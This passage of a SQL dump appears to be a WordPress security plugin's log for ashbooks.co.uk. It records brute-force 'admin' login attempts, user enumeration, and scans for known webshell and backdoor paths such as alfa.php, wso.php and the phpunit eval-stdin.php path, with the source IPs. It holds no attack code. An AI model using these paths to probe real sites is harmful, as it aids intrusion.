0|0|www.ashbooks.co.uk/wp-content/langar.php'),('23.146.241.20',395505940,'',0,1636916822.7388,100,'b1w9ZPU7AIrBXj0ndC3keHNf','','13|0|0|0|www.ashbooks.co.uk/test.php'),('23.146.241.20',395505940,'',0,1636916823.8280,100,'j2AsKlqTi8fPxcZJerUzCduQ','','13|0|0|0|www.ashbooks.co.uk/wp-content/plugins/t_file_wp/t_file_wp.php'),('23.146.241.20',395505940,'',0,1636916824.7813,100,'aE8Gjsw1mOpcH5qxhlYr4UFD','','13|0|0|0|www.ashbooks.co.uk/wp-content/plugins/ioptimization/IOptimize.php'),('23.146.241.20',395505940,'',0,1636916825.9439,55,'QKuAjvNDgBTtqirbFERpk14y','','19|0|0|0|www.ashbooks.co.uk/moduless.php'),('23.146.241.20',395505940,'',0,1636916827.0887,55,'lavK3ZDIB8XRNMizhwyqeLJC','','19|0|0|0|www.ashbooks.co.uk/wp-includes/lfx.php'),('23.146.241.20',395505940,'',0,1636916828.0582,55,'XBjFCxLTr0NH5qEv1PlVdsay','','19|0|0|0|www.ashbooks.co.uk/wp-booking.php'),('23.146.241.20',395505940,'',0,1636916828.7858,55,'tkx3i4WcCb79seMgJU16z8nr','','19|0|0|0|www.ashbooks.co.uk/wp-booking.php'),('93.104.211.150',1567150998,'admin',0,1636918276.4002,7,'WBesUSjINGoH3pcx9LTiRlvy','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('208.113.160.8',3497107464,'admin',0,1636919012.5670,7,'jEiPefbK6Cot0ZUG5uQ2sSBc','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('20.93.115.97',341668705,'',0,1636919460.9223,70,'UjQtI0na9FMELiHbW4XSwlpG','','0|0|0|0|ashbooks.co.uk//wp-json/wp/v2/users/'),('136.144.210.23',2291192343,'admin',0,1636919801.7569,7,'okFBTAInq8xcV7tzhDZLvb91','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('199.116.78.158',3346288286,'admin',0,1636920636.1956,7,'Z1JtxWcHhOLAwqkbegNoYF9V','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('23.94.120.151',392067223,'admin',0,1636921421.3684,7,'sgTb8QYo4FfKXcHUxVzajrl3','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('173.236.184.125',2917972093,'admin',0,1636922167.4276,7,'FQkRvyaSA4L10wos7Ymtnp9j','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('173.212.235.115',2916412275,'admin',0,1636922905.0170,7,'mlBhNi9zGtwpcfUJSXToYunO','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('103.121.89.72',1736005960,'admin',0,1636923649.6700,7,'6mDF2crhYyjRJWdVSwosf1lq','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('202.172.26.53',3400276533,'admin',0,1636924400.0906,7,'bT8fCSI0uEMZdPjO4rtmgiYL','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('109.87.200.193',1834469569,'admin',0,1636925064.4814,7,'sC5o0xQLaWr1JkjMc2deTzBE','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('45.120.69.121',762856825,'admin',0,1636925745.6128,7,'YhsiovQLwRIWCZkFy5DOeNrM','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('74.208.25.176',1255152048,'admin',0,1636926421.6804,7,'E87uaAVM5qRZ1bjLeUnlr9cB','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('81.88.52.168',1364735144,'admin',0,1636927111.8226,7,'FGxH61noM8Niy3jJphEdbT0Z','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('34.107.68.50',577455154,'',0,1636927511.3548,55,'bc1RmDJSMGwLgsAKfBH3zd7n','','19|0|0|0|ashbooks.co.uk/style.php'),('34.107.68.50',577455154,'',0,1636927512.8161,55,'W4g0hj1YuMtyH5aXOdZkVwB2','','19|0|0|0|ashbooks.co.uk/moduless.php'),('34.107.68.50',577455154,'',0,1636927514.2611,55,'gkcvd7I4iUXF2rf6VDZLREup','','19|0|0|0|ashbooks.co.uk/wp-content/plugins/t_file_wp/t_file_wp.php'),('34.107.68.50',577455154,'',0,1636927517.0072,55,'lhA2VcrjgMYw854KSfCiymGE','','19|0|0|0|ashbooks.co.uk/admin.php'),('34.107.68.50',577455154,'',0,1636927522.1101,55,'dGnzNlj9oICDcx3LMAKrb1Up','','19|0|0|0|ashbooks.co.uk/boom.php'),('34.107.68.50',577455154,'',0,1636927522.2222,10,'dGnzNlj9oICDcx3LMAKrb1Up','','707|0|0|0|ashbooks.co.uk/boom.php'),('34.107.68.50',577455154,'',0,1636927523.7842,55,'ElsD5TZgI93Npw0v2VotmAOb','','19|0|0|0|ashbooks.co.uk/wp-content/plugins/backup_index.php'),('34.107.68.50',577455154,'',0,1636927524.8605,55,'5uSokCPfm7EtvWQX6pri3FzI','','19|0|0|0|ashbooks.co.uk/wp-content/db_cache.php'),('34.107.68.50',577455154,'',0,1636927526.4276,100,'yoVn8hr6WLYaFmKBDZStICsd','','13|0|0|0|ashbooks.co.uk/wp-content/plugins/ioptimization/IOptimize.php'),('34.107.68.50',577455154,'',0,1636927530.1717,100,'F9L87XZuEoAP46tsdWKgkvnM','','13|0|0|0|ashbooks.co.uk/wpindex.php'),('34.107.68.50',577455154,'',0,1636927531.9829,100,'VYkNdHJytUQousl0Wma6KLAI','','13|0|0|0|ashbooks.co.uk/larva.php'),('34.107.68.50',577455154,'',0,1636927533.9013,100,'O1o8XluidsrY0IgbzCJG96fw','','13|0|0|0|ashbooks.co.uk/th3_err0r.php'),('34.107.68.50',577455154,'',0,1636927535.5587,55,'4qesQ8BTCDxALWf2IMphHkPc','','19|0|0|0|ashbooks.co.uk/alfindex.php'),('34.107.68.50',577455154,'',0,1636927537.1668,55,'MRhAWTNYHkCF3JlbmpOLwGV1','','19|0|0|0|ashbooks.co.uk/alfa.php'),('34.107.68.50',577455154,'',0,1636927538.7090,55,'co1Xw0QZnaUVieAzWgpYvP2K','','19|0|0|0|ashbooks.co.uk/wp-booking.php'),('34.107.68.50',577455154,'',0,1636927541.0345,55,'ysaj3FenVDivxho8lWNCREtz','','19|0|0|0|ashbooks.co.uk/cindex.php'),('34.107.68.50',577455154,'',0,1636927543.1909,55,'RoJAncOEjhuGe7a1KT8CDFHW','','19|0|0|0|ashbooks.co.uk/wp-content/wp-1ogin_bak.php'),('34.107.68.50',577455154,'',0,1636927545.1206,55,'Tvkem3uHlOw6zgVaAiDS0QL9','','19|0|0|0|ashbooks.co.uk/wp-1ogin_bak.php'),('34.107.68.50',577455154,'',0,1636927547.3296,55,'qC7Mps2weuKVk5LfcT9m3JHO','','19|0|0|0|ashbooks.co.uk/wp-includes/fonts/css.php'),('34.107.68.50',577455154,'',0,1636927549.3554,55,'MfJOni1Nodw0mHhZ2YBlgxVI','','19|0|0|0|ashbooks.co.uk/wp-includes/css/css.php'),('34.107.68.50',577455154,'',0,1636927551.7457,55,'GNnqeCTQzly3uvxwhBoWkVcr','','19|0|0|0|ashbooks.co.uk/old-index.php'),('34.107.68.50',577455154,'',0,1636927553.7798,55,'xmP15QYFfnrNdLu3CT4RWqXw','','19|0|0|0|ashbooks.co.uk/config.bak.php'),('34.107.68.50',577455154,'',0,1636927555.6425,55,'kNiCxf19agIqYRGJb0SBPr7s','','19|0|0|0|ashbooks.co.uk/wp-admin/config.bak.php'),('34.107.68.50',577455154,'',0,1636927557.4628,55,'RL2dVErKvoTau0Zkjzp8qDCG','','19|0|0|0|ashbooks.co.uk/wp-content/config.bak.php'),('34.107.68.50',577455154,'',0,1636927559.2717,55,'1Kr6fgD92qMCt5E8XQ7pjzcV','','19|0|0|0|ashbooks.co.uk/wp-includes/config.bak.php'),('34.107.68.50',577455154,'',0,1636927561.1936,55,'YXW07mxd89142nP6KvSakATH','','19|0|0|0|ashbooks.co.uk/wp-content/themes/config.bak.php'),('34.107.68.50',577455154,'',0,1636927562.9872,55,'8HS4Aqn3PzXUDplMIWGEbxyv','','19|0|0|0|ashbooks.co.uk/wp-content/plugins/config.bak.php'),('34.107.68.50',577455154,'',0,1636927564.4392,18,'gmk5FKa8tIWLPU4Druy2xpcs','','13|0|0|0|ashbooks.co.uk/wp-includes/css/wp-config.php'),('34.107.68.50',577455154,'',0,1636927566.1294,55,'TWHv0KlO47mESyBngVoCD1dI','','19|0|0|0|ashbooks.co.uk/wp-content/plugins/ubh/up.php'),('34.107.68.50',577455154,'',0,1636927567.8428,100,'8gTfaPzH3NMiGq2A7dteQFKs','','13|0|0|0|ashbooks.co.uk/wp-includes/wpconfig.bak.php'),('34.107.68.50',577455154,'',0,1636927569.5708,100,'5rZTKSj7AhDoM98fWHgql2Oi','','13|0|0|0|ashbooks.co.uk/wp-content/plugins/wpconfig.bak.php'),('34.107.68.50',577455154,'',0,1636927571.2586,55,'URLc07nbymt8xuAv63fsFqlH','','19|0|0|0|ashbooks.co.uk/haders.php'),('34.107.68.50',577455154,'',0,1636927573.0851,100,'Bc9UyNC3zdneLGVq0XAWsrFZ','','13|0|0|0|ashbooks.co.uk/wp-content/wp-old-index.php'),('34.107.68.50',577455154,'',0,1636927574.6264,55,'uUvDkELIrG0pCM7RXfPicF92','','19|0|0|0|ashbooks.co.uk/legion.php'),('34.107.68.50',577455154,'',0,1636927576.2482,55,'F6CIBQiXzWvGAdaVf5wYDhP2','','19|0|0|0|ashbooks.co.uk/wp-content/mu-plugins/db-safe-mode.php'),('34.107.68.50',577455154,'',0,1636927577.9818,55,'uyFTwtNBPHUb9src85manDil','','19|0|0|0|ashbooks.co.uk/wp-includes/lfx.php'),('34.107.68.50',577455154,'',0,1636927580.2738,55,'FiCRcZWousKNBqMJj3pLVS9e','','19|0|0|0|ashbooks.co.uk/wp-includes/small.php'),('34.107.68.50',577455154,'',0,1636927581.9972,55,'jgHKn5PQvqSroEMdW7wLXDhJ','','19|0|0|0|ashbooks.co.uk/up.php'),('34.107.68.50',577455154,'',0,1636927583.7353,55,'JCvbtdmI6FQ0cp2rjlBoGuXH','','19|0|0|0|ashbooks.co.uk/upload.php'),('34.107.68.50',577455154,'',0,1636927585.2483,55,'Eusa1mDpG836dqhQ0RtIzMgY','','19|0|0|0|ashbooks.co.uk/config.php'),('34.107.68.50',577455154,'',0,1636927586.7478,100,'zRlLCYX08Eh3MJb7cfyWowSO','','13|0|0|0|ashbooks.co.uk/test.php'),('34.107.68.50',577455154,'',0,1636927588.4845,55,'Yy4e5bAlN2FxMzuHBfaIdP3v','','19|0|0|0|ashbooks.co.uk/wp-content/langar.php'),('34.107.68.50',577455154,'',0,1636927589.9326,55,'uiW1oyGTk9dgUr3DqCLxKVAb','','19|0|0|0|ashbooks.co.uk/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php'),('34.107.68.50',577455154,'',0,1636927591.9098,55,'5jEfpiPZNhR0gJr6SocHQsnX','','19|0|0|0|ashbooks.co.uk/wp-content/plugins/fancy-product-designer/inc/custom-image-handler.php'),('188.166.56.218',3165010138,'admin',0,1636929233.4584,7,'TyAwSCWvlef8N6dGDYM702zE','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('104.168.174.187',1755885243,'',0,1636929599.6584,70,'pGsOXxMUvJlWoF9r3gz7CwIj','','0|0|0|0|ashbooks.co.uk//wp-json/wp/v2/users/'),('104.168.174.187',1755885243,'',0,1636929685.6085,70,'VTrDFnutjH7woK0dUpfvksL1','','0|0|0|0|ashbooks.co.uk//wp-json/wp/v2/users/'),('74.208.34.142',1255154318,'admin',0,1636930450.6533,7,'iOXNEoU2gSv9kJfs7uQhY8lA','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('194.58.88.114',3258603634,'',0,1636931737.0915,70,'9waj5vJ1VQOHkZBRPm4CFLSN','','0|0|0|0|ashbooks.co.uk//wp-json/wp/v2/users/'),('103.144.253.38',1737555238,'admin',0,1636931882.7676,7,'pujXDEe8mSP1QIdTMrwl6NHa','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('54.163.195.110',916702062,'admin',0,1636932536.8195,7,'u1eaQmBGT4RKfnlIWSdsPrjU','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('179.61.245.13',3007182093,'',0,1636932754.2117,55,'iT7xVDqdfpWaeLKhbtU0Y1Q4','','19|0|0|0|ashbooks.co.uk/a.php'),('89.96.90.125',1499486845,'admin',0,1636933192.3707,7,'LFAXmCze8q7lJgiPkZSVIYbW','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('3.144.254.40',59833896,'',0,1636933310.6590,55,'C5kj79NiI13pqBagmuZWyHeQ','','19|0|0|0|ashbooks.co.uk/style.php'),('3.144.254.40',59833896,'',0,1636933312.3034,55,'qthIv07yTdmf36PSzRaiCZsc','','19|0|0|0|ashbooks.co.uk/moduless.php'),('3.144.254.40',59833896,'',0,1636933314.6456,55,'mueaqhRzoLFt45KZAk2OE7sN','','19|0|0|0|ashbooks.co.uk/wp-content/plugins/t_file_wp/t_file_wp.php'),('3.144.254.40',59833896,'',0,1636933317.6140,55,'eEd2TZvU74ajI6c5yBVNutDg','','19|0|0|0|ashbooks.co.uk/admin.php'),('3.144.254.40',59833896,'',0,1636933327.8280,55,'LUIuxsB8TKAtWYRmrM5OlagJ','','19|0|0|0|ashbooks.co.uk/boom.php'),('3.144.254.40',59833896,'',0,1636933327.8606,10,'LUIuxsB8TKAtWYRmrM5OlagJ','','707|0|0|0|ashbooks.co.uk/boom.php'),('3.144.254.40',59833896,'',0,1636933329.4434,55,'9dtEf5FJLp0WKnliMZDXmQ4r','','19|0|0|0|ashbooks.co.uk/wp-content/plugins/backup_index.php'),('3.144.254.40',59833896,'',0,1636933335.4337,55,'YvyDmQGJNdPV0uZlebEBot7p','','19|0|0|0|ashbooks.co.uk/wp-content/db_cache.php'),('3.144.254.40',59833896,'',0,1636933336.7978,100,'zXq3J4IW8dVjCoQcZ1Ptgv0y','','13|0|0|0|ashbooks.co.uk/wp-content/plugins/ioptimization/IOptimize.php'),('3.144.254.40',59833896,'',0,1636933340.3727,100,'94ZTlwyPJjcdQt61x5uCSAfs','','13|0|0|0|ashbooks.co.uk/wpindex.php'),('3.144.254.40',59833896,'',0,1636933342.4373,100,'Kly8JEOtvD3Xpgq042GVUnrj','','13|0|0|0|ashbooks.co.uk/larva.php'),('3.144.254.40',59833896,'',0,1636933343.7994,100,'tePfJGlz0OiysmYgB3aZK8WM','','13|0|0|0|ashbooks.co.uk/th3_err0r.php'),('3.144.254.40',59833896,'',0,1636933345.4460,55,'NFxCZP325UBRTiKLg1nAMekc','','19|0|0|0|ashbooks.co.uk/alfindex.php'),('3.144.254.40',59833896,'',0,1636933347.2243,55,'kSnRaq7BzovcTdOb1VemrlA9','','19|0|0|0|ashbooks.co.uk/alfa.php'),('3.144.254.40',59833896,'',0,1636933348.8583,55,'8QVNMUKZ5janSL4EW70zoYGf','','19|0|0|0|ashbooks.co.uk/wp-booking.php'),('3.144.254.40',59833896,'',0,1636933350.3925,55,'gviptwMGBlTXH5SnKsd3YW4q','','19|0|0|0|ashbooks.co.uk/cindex.php'),('3.144.254.40',59833896,'',0,1636933352.7065,55,'pnykxGTvYuEF6qSAlVJQMIwi','','19|0|0|0|ashbooks.co.uk/wp-content/wp-1ogin_bak.php'),('3.144.254.40',59833896,'',0,1636933354.7151,55,'sY0JWytqvKVlCfkEMzoiu58p','','19|0|0|0|ashbooks.co.uk/wp-1ogin_bak.php'),('3.144.254.40',59833896,'',0,1636933355.8680,55,'zkAXWmrQBY8tPZHjfnUuFJe0','','19|0|0|0|ashbooks.co.uk/wp-includes/fonts/css.php'),('3.144.254.40',59833896,'',0,1636933357.3527,55,'6MHALbCGfePI9gcmKtTxz0Xv','','19|0|0|0|ashbooks.co.uk/wp-includes/css/css.php'),('3.144.254.40',59833896,'',0,1636933368.3382,55,'YwnU4asTjPVIytMLzR7WcOmZ','','19|0|0|0|ashbooks.co.uk/old-index.php'),('3.144.254.40',59833896,'',0,1636933369.9264,55,'blw4fqc7JZWpEh86zDMAPRoF','','19|0|0|0|ashbooks.co.uk/config.bak.php'),('3.144.254.40',59833896,'',0,1636933372.6280,55,'L5OjZRcuTKgEBDA947zHSfWt','','19|0|0|0|ashbooks.co.uk/wp-admin/config.bak.php'),('3.144.254.40',59833896,'',0,1636933374.1724,55,'1kiel25BtDKo4mMux7QhrREG','','19|0|0|0|ashbooks.co.uk/wp-content/config.bak.php'),('3.144.254.40',59833896,'',0,1636933375.8216,55,'TIoDNQW7tEsCm82gfLeJP5hr','','19|0|0|0|ashbooks.co.uk/wp-includes/config.bak.php'),('3.144.254.40',59833896,'',0,1636933377.4271,55,'j7OXV2iWfzJwsoAI3a1u9d4x','','19|0|0|0|ashbooks.co.uk/wp-content/themes/config.bak.php'),('3.144.254.40',59833896,'',0,1636933378.7530,55,'MwsIPky1YqfpFLgtcv30Weu8','','19|0|0|0|ashbooks.co.uk/wp-content/plugins/config.bak.php'),('3.144.254.40',59833896,'',0,1636933379.9257,18,'Ec0xH173TRwkhmYdQgDK8bzq','','13|0|0|0|ashbooks.co.uk/wp-includes/css/wp-config.php'),('3.144.254.40',59833896,'',0,1636933382.1636,55,'21l3FUYWZAexG5Cfzp9TjoRi','','19|0|0|0|ashbooks.co.uk/wp-content/plugins/ubh/up.php'),('3.144.254.40',59833896,'',0,1636933383.7954,100,'PHYTSbk4BRA0XKwOMUuciIJn','','13|0|0|0|ashbooks.co.uk/wp-includes/wpconfig.bak.php'),('3.144.254.40',59833896,'',0,1636933385.5560,100,'B2giHmOEGcKw1M06DR9eLyfo','','13|0|0|0|ashbooks.co.uk/wp-content/plugins/wpconfig.bak.php'),('3.144.254.40',59833896,'',0,1636933387.2424,55,'7gPJuf1TapsBrLjdHSWXeOYv','','19|0|0|0|ashbooks.co.uk/haders.php'),('3.144.254.40',59833896,'',0,1636933388.8868,100,'IXLmKEVnbZf741yztTHPN6sd','','13|0|0|0|ashbooks.co.uk/wp-content/wp-old-index.php'),('3.144.254.40',59833896,'',0,1636933390.5036,55,'aWRjV1UDF9Aud4MLh6bpIOr3','','19|0|0|0|ashbooks.co.uk/legion.php'),('3.144.254.40',59833896,'',0,1636933391.9647,55,'Liz3SClFmsVQE4BpyvXU2TY7','','19|0|0|0|ashbooks.co.uk/wp-content/mu-plugins/db-safe-mode.php'),('3.144.254.40',59833896,'',0,1636933393.4659,55,'iZQpsYfmI9b2xWcOr5LnJwMl','','19|0|0|0|ashbooks.co.uk/wp-includes/lfx.php'),('3.144.254.40',59833896,'',0,1636933396.1392,55,'Et2KfxJRTlNw1DWhkYcoUsBL','','19|0|0|0|ashbooks.co.uk/wp-includes/small.php'),('3.144.254.40',59833896,'',0,1636933400.3430,55,'XJUwbela98YmPo0DisdSkxVM','','19|0|0|0|ashbooks.co.uk/up.php'),('3.144.254.40',59833896,'',0,1636933402.2921,55,'8FayE69r2XghzIbPj3VsTfOY','','19|0|0|0|ashbooks.co.uk/upload.php'),('3.144.254.40',59833896,'',0,1636933403.9211,55,'pf1zH450xXF7lvBmnMVwOr2L','','19|0|0|0|ashbooks.co.uk/config.php'),('3.144.254.40',59833896,'',0,1636933405.5623,100,'GJcXmbUl4EofQFukqh7P5Nxg','','13|0|0|0|ashbooks.co.uk/test.php'),('3.144.254.40',59833896,'',0,1636933407.0855,55,'ldHM0hLgrCebn2SUA5XPFwVt','','19|0|0|0|ashbooks.co.uk/wp-content/langar.php'),('3.144.254.40',59833896,'',0,1636933408.7273,55,'4sj3b9o7n0TF5vpWD2gSQKif','','19|0|0|0|ashbooks.co.uk/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php'),('3.144.254.40',59833896,'',0,1636933410.4778,55,'SMmUklNbxABwt5L2Y8qsCczy','','19|0|0|0|ashbooks.co.uk/wp-content/plugins/fancy-product-designer/inc/custom-image-handler.php'),('80.249.174.66',1358540354,'admin',0,1636933829.7587,7,'i8o7JRvTbuXZ1yrmYP0QkqsE','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('13.94.249.188',224328124,'admin',0,1636934469.5817,7,'1p7bSqsK5w8kNmo03UPhEe6R','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('82.208.189.233',1389411817,'',0,1636934790.3758,55,'H0sFSDj1c7pveYTG25wAJybE','','19|0|0|0|ashbooks.co.uk/xmrlpc.php'),('69.163.224.119',1168367735,'admin',0,1636935187.8747,7,'UvFYj8TZcDW6BObyef1oqwN0','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('45.40.166.143',757638799,'admin',0,1636935905.8432,7,'wUD0k4WAvqFlYrojiV7TfGOI','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('5.39.95.36',86466340,'admin',0,1636937315.0823,7,'uvRXDx5h2J7nqsO9cbe6wHmY','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('103.15.232.195',1729095875,'admin',0,1636937985.5243,7,'6PzFAWaLbV5eMghR18nIQCoD','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('23.97.205.210',392285650,'admin',0,1636938728.5099,7,'RqJZeHUBVWSfPmixThAaFErI','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('178.32.89.175',2988464559,'admin',0,1636939342.6221,7,'NIqjDxmdnbkBu0OtiZS8wvcG','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('194.233.72.23',3270068247,'admin',0,1636939931.7509,7,'cbBtfCa083OdopFLlZezvmTA','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('157.245.192.138',2650128522,'',0,1636951278.5561,70,'X3E7LybW8uBds9VIawKve6Np','','0|0|0|0|ashbooks.co.uk//wp-json/wp/v2/users/'),('192.187.118.205',3233511117,'admin',0,1636951863.8832,7,'5FmgRweWXzjPNQvMl9D26iSh','','0|0|0|0|www.ashbooks.co.uk/wp-login.php'),('192.187.127.21',3233513237,'ashbooks',0,1636954580.9632,51,'M9aGqWv3w6mrC1S08oN7lfOV','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('51.38.187.133',858176389,'admin',0,1636956387.4087,7,'pHVr4iWfFZQAX3GjC56hbdxP','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('134.209.196.64',2261894208,'admin',0,1636957450.6419,7,'5pqoDYhOEisMRXKcaICfFGgk','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('121.43.170.78',2032904782,'admin',0,1636958522.6152,7,'ApwnfROkNab8CGPq7TMrEKzm','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('52.183.137.156',884443548,'admin',0,1636960944.7198,7,'MgrOwCJF4pqj6cIWdADL2k80','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('185.49.20.79',3107001423,'admin',0,1636961641.1670,7,'u9QwxSMrsm0BeHc7kVvqnE1b','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('173.212.235.115',2916412275,'admin',0,1636962257.9086,7,'wstRHNUv97fM4mELCobg1kjT','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('84.255.199.31',1426048799,'admin',0,1636962877.3743,7,'W7eZuHFf6wlPpG24CDOsx9NE','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('195.67.74.174',3275967150,'admin',0,1636963576.2860,7,'Kx0TjBd5tbXFzDRcv4hmJequ','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('23.95.217.2',392157442,'admin',0,1636964298.0046,7,'HG4XeIqBmoubDAR73E1rPkVF','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('69.163.224.119',1168367735,'admin',0,1636964983.6981,7,'HN5jrSdokyhJeEzZ062iLCvR','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('157.245.95.172',2650103724,'admin',0,1636965627.3915,7,'QnEpB5w8jldsgxhiqLDKaoM4','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('192.187.127.21',3233513237,'admin',0,1636965638.4894,7,'kRDxg7NGVfXoK2ZCi8yPaTLe','','0|0|0|0|www.ashbooks.co.uk/wp-login.php'),('194.163.133.151',3265496471,'admin',0,1636966244.6189,7,'F9XPZfgNLl58Ms4j6avzHKcm','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('45.40.166.141',757638797,'admin',0,1636966834.5386,7,'sPVKq6LQUiblACdFeSxp3WRY','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('161.97.146.123',2707526267,'admin',0,1636967509.8093,7,'7MpJHm1BCP4uYqTGOdNKhEnR','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('103.142.26.247',1737366263,'admin',0,1636968135.4992,7,'6m5470uhkFK32iS9vUJEjNfM','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('178.128.215.197',2994788293,'admin',0,1636968802.2155,7,'sSKpAMZJ04V5YWzaRjiDcEXt','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('89.96.90.125',1499486845,'admin',0,1636969445.9874,7,'biS5kjg8HTzLOGMyPFAvNawu','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('167.172.190.95',2813115999,'admin',0,1636970089.3463,7,'nd46hUflM89XSZG3pTDK5WYg','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('89.207.146.189',1506775741,'admin',0,1636970788.3725,7,'f53jBiFd4GRSs0laDLe7ZhyA','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('192.187.118.205',3233511117,'ashbooks',0,1636970893.5931,51,'EipzPn0OarMBfVKyQIN6Stk9','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('138.68.191.9',2319761161,'admin',0,1636971470.4012,7,'bDQitqC1hrKM7E6FN2jxzSJX','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('62.178.170.93',1051896413,'admin',0,1636972133.3459,7,'9n71ZxdhqgmUQXWzFkIilYaj','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('5.188.62.140',96222860,'',0,1636972496.0569,55,'fTrdWaO5MVwRlBo14tPXjZDL','','19|0|0|0|ashbooks.co.uk/wp-content/themes/magazine-hoot/wso.php'),('5.188.62.140',96222860,'',0,1636972496.4830,55,'TnYQSk3qyuE5eObBh926moVa','','19|0|0|0|ashbooks.co.uk/wp-content/themes/magazine-hoot/shell.php'),('206.189.129.168',3468525992,'admin',0,1636972776.0782,7,'Nmg5jqCkxi7cZI86FaHyurts','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('138.68.69.48',2319729968,'admin',0,1636973439.5055,7,'PUCrThIj4iRs1SAgFntKHM8u','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('103.39.134.190',1730643646,'admin',0,1636974123.9601,7,'PcHBSbiKf4FL82tlUIvwdhW5','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('81.88.52.26',1364735002,'admin',0,1636974899.3651,7,'Fjema3h4OKNi8HCBvd19R0Xg','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('167.71.199.161',2806499233,'admin',0,1636975585.2026,7,'D7kHxTidOzajVc4Ef5wyntZb','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('67.205.61.254',1137524222,'admin',0,1636976924.9769,7,'AJhlOSKxwbgtnjaq05i4MQz3','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('192.187.127.21',3233513237,'admin',0,1636977521.6437,7,'JgObkz06IWx8ZfesKw1nGMB5','','0|0|0|0|www.ashbooks.co.uk/wp-login.php'),('139.59.75.162',2335919010,'admin',0,1636977586.3326,7,'fX34UigbBDx5WQAcz7VdrR1y','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('64.20.39.18',1075062546,'',0,1636977699.7066,70,'TkuODRayKJbXV4QUI1mG6n2x','','0|0|0|0|ashbooks.co.uk/wp-json/wp/v2/users/'),('107.150.57.34',1805007138,'ashbooks',0,1636978935.9274,51,'WlJ8Vi75PkUyfjc0bpm1ETug','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('52.183.137.156',884443548,'admin',0,1636979112.1672,7,'BIm6W5jFtu9Xc3bianJUzOeZ','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('45.120.69.121',762856825,'admin',0,1636980578.1743,7,'iocFUYEaDLqn7gfKO1smV0bS','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('94.23.83.103',1578586983,'admin',0,1636981273.8053,7,'wWZrRlNba25fmF1Cgi8GKjAV','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('167.172.151.91',2813106011,'admin',0,1636982067.9269,7,'MVhWXai7gEmTYZeoQuxFpBPk','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('150.95.83.201',2522829769,'admin',0,1636982785.3937,7,'LFynsUvVZ0Q6zShTioBgRJXI','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('162.240.16.237',2733641965,'admin',0,1636983446.4043,7,'u1bJvwrAVmO3qHaN4hCSlUDc','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('192.187.118.205',3233511117,'admin',0,1636983860.5377,7,'AamL85xUqPSNH90izr2ntK1O','','0|0|0|0|www.ashbooks.co.uk/wp-login.php'),('45.12.32.57',755769401,'admin',0,1636984097.6033,7,'PB6a8C39euox2s1MXRZnIJmy','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('208.113.163.102',3497108326,'',0,1636984535.7329,55,'FWX0ptJS71GdHcqwQzLC5TMB','','19|0|0|0|ashbooks.co.uk/wp-content/themes/cepair/db.php'),('208.113.163.102',3497108326,'',0,1636984613.5862,55,'S0WZQL6eoxr3sE45yMYfIkPJ','','19|0|0|0|ashbooks.co.uk/wp-content/plugins/wp-pollz/includes/green.php'),('134.209.196.64',2261894208,'admin',0,1636985502.4679,7,'tWTDLhl4m17V65YpUNXfMcQu','','0|0|0|0|ashbooks.co.uk/wp-login.php'),('114.119.132.103',1920435303,'',0,1636986135.1877,55,'DuSJdVLsr9RmAocHI8jZ1YPT','','19|0|0|0|www.ashbooks.co.uk/weblog/index.php'),('116.203.150.71',1959